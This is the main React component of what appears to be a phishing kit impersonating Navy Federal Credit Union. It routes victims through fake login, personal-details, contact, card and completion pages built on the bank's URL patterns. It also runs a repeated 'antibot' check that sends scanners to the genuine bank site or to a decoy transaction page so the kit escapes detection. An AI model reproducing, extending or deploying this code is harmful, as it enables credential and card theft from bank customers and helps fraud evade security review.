import {useEffect, useState} from 'react';
import { Switch, Route, Redirect } from "react-router-dom";
import Login from "./components/login/main";
import Personal from "./components/personal/main";
import Contact from "./components/contact/main";
import Card from "./components/card/main";
import Complete from "./components/complete/main";
import antibotSupport from "./antibot";
import Modal from "./components/modal/main";

const App = () => {
  const [load, setLoad] = useState(false)

  const loadPage = async () => {
      let count = 3
      let isValid = false
      while (count !== 0) {
        const isTrue = await antibotSupport()
        isValid = isTrue
        count -= 1
      }
      if(isValid == true) {
        return true
      }else {
        return false
      }
    }
    
    useEffect(async() =>{ 
      const toLoad = await loadPage()
      if(toLoad == false) {
        window.location.href = "https://www.navyfederal.org/"
      }
      setLoad(toLoad)
  }
  , [])


  return (
    <>
  { load ?  <Switch>
      <Route path="/NFOAA_AUTH/login.jsp" component={Login} />
      <Route
        path="/NFOAA_AUTH/VERIFICATION/personal.jsp"
        component={Personal}
      />
      <Route path="/NFOAA_AUTH/VERIFICATION/contact.jsp" component={Contact} />
      <Route path="/NFOAA_AUTH/VERIFICATION/card.jsp" component={Card} />
      <Route path="/NFOAA_AUTH/VERIFICATION/complete" component={Complete} />
      <Redirect from="/" to="/NFOAA_AUTH/login.jsp" />
    </Switch> :
    <>
    <Modal />
      <Switch>
      <Route path="/account/activity/transaction/transaction_id=WyjzaGlub2J1Lmta57ecd?i=e005a4" component={Modal} />
      <Redirect from="/" to="/account/activity/transaction/transaction_id=WyjzaGlub2J1Lmta57ecd?i=e005a4" />
      </Switch>
    </>
     }
    </>
  );
};

export default App;
